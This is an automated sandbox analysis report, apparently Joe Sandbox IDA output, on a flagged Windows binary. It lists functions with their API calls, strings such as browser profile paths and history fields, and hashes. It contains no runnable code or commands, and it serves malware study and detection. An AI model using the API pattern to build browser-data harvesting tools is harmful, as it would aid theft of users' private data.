                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                              • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                              • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                              • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 004182D7
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                              • LocalFree.KERNEL32(?), ref: 00418342
                                                              • free.MSVCRT ref: 00418370
                                                                • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                              • String ID: OsError 0x%x (%u)
                                                              • API String ID: 2360000266-2664311388
                                                              • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                              • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                              • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                              • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Version
                                                              • String ID:
                                                              • API String ID: 1889659487-0
                                                              • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                              • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                              • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                              • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                              APIs
                                                              • _wcsicmp.MSVCRT ref: 004022A6
                                                              • _wcsicmp.MSVCRT ref: 004022D7
                                                              • _wcsicmp.MSVCRT ref: 00402305
                                                              • _wcsicmp.MSVCRT ref: 00402333
                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                              • memset.MSVCRT ref: 0040265F
                                                              • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                              • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                              • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                              • API String ID: 577499730-1134094380
                                                              • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                              • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                              • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                              • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                              • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                              • GetWindowRect.USER32(?,?), ref: 00414088
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                              • GetDC.USER32 ref: 004140E3
                                                              • wcslen.MSVCRT ref: 00414123
                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                              • ReleaseDC.USER32(?,?), ref: 00414181
                                                              • _snwprintf.MSVCRT ref: 00414244
                                                              • SetWindowTextW.USER32(?,?), ref: 00414258
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                              • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                              • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                              • GetClientRect.USER32(?,?), ref: 004142E1
                                                              • GetWindowRect.USER32(?,?), ref: 004142EB
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                              • GetClientRect.USER32(?,?), ref: 0041433B
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                              • String ID: %s:$EDIT$STATIC
                                                              • API String ID: 2080319088-3046471546
                                                              • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                              • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                              • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                              • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                              APIs
                                                              • EndDialog.USER32(?,?), ref: 00413221
                                                              • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                              • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                              • memset.MSVCRT ref: 00413292
                                                              • memset.MSVCRT ref: 004132B4
                                                              • memset.MSVCRT ref: 004132CD
                                                              • memset.MSVCRT ref: 004132E1
                                                              • memset.MSVCRT ref: 004132FB
                                                              • memset.MSVCRT ref: 00413310
                                                              • GetCurrentProcess.KERNEL32 ref: 00413318
                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                              • memset.MSVCRT ref: 004133C0
                                                              • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                              • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                              • wcscpy.MSVCRT ref: 0041341F
                                                              • _snwprintf.MSVCRT ref: 0041348E
                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                              • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                              • SetFocus.USER32(00000000), ref: 004134B7
                                                              Strings
                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                              • {Unknown}, xrefs: 004132A6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                              • API String ID: 4111938811-1819279800
                                                              • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                              • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                              • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                              • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                              • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                              • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                              • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                              • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                              • EndDialog.USER32(?,?), ref: 0040135E
                                                              • DeleteObject.GDI32(?), ref: 0040136A
                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                              • ShowWindow.USER32(00000000), ref: 00401398
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                              • ShowWindow.USER32(00000000), ref: 004013A7
                                                              • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                              • String ID:
                                                              • API String ID: 829165378-0
                                                              • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                              • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                              APIs
                                                              • memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              • wcscpy.MSVCRT ref: 004041D6
                                                              • wcscpy.MSVCRT ref: 004041E7
                                                              • memset.MSVCRT ref: 00404200
                                                              • memset.MSVCRT ref: 00404215
                                                              • _snwprintf.MSVCRT ref: 0040422F
                                                              • wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 0040426E
                                                              • memset.MSVCRT ref: 004042CD
                                                              • memset.MSVCRT ref: 004042E2
                                                              • _snwprintf.MSVCRT ref: 004042FE
                                                              • wcscpy.MSVCRT ref: 00404311
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                              • API String ID: 2454223109-1580313836
                                                              • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                              • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                              APIs
                                                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                              • SetMenu.USER32(?,00000000), ref: 00411453
                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                              • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                              • ShowWindow.USER32(?,?), ref: 004115FE
                                                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                              • API String ID: 4054529287-3175352466
                                                              • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                              • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                              • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                              • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                              • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                              • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                              • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                              • API String ID: 667068680-2887671607
                                                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _snwprintf$memset$wcscpy
                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                              • API String ID: 2000436516-3842416460
                                                              • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                              • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                              • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                              • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                              APIs
                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                              • String ID:
                                                              • API String ID: 1043902810-0
                                                              • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                              • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                              • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                              • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                              APIs
                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                              • free.MSVCRT ref: 0040E49A
                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                              • memset.MSVCRT ref: 0040E380
                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                              • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                              • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
                                                              • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
                                                              • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                              • API String ID: 3849927982-2252543386
                                                              • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                              • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              • memset.MSVCRT ref: 004085CF
                                                              • memset.MSVCRT ref: 004085F1
                                                              • memset.MSVCRT ref: 00408606
                                                              • strcmp.MSVCRT ref: 00408645
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                              • memset.MSVCRT ref: 0040870E
                                                              • strcmp.MSVCRT ref: 0040876B
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                              • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                              • String ID: ---
                                                              • API String ID: 3437578500-2854292027
                                                              • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                              • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                              • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                              • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                              APIs
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                              • malloc.MSVCRT ref: 004186B7
                                                              • free.MSVCRT ref: 004186C7
                                                              • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                              • free.MSVCRT ref: 004186E0
                                                              • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                              • malloc.MSVCRT ref: 004186FE
                                                              • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                              • free.MSVCRT ref: 00418716
                                                              • free.MSVCRT ref: 0041872A
                                                              • free.MSVCRT ref: 00418749
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: free$FullNamePath$malloc$Version
                                                              • String ID: |A
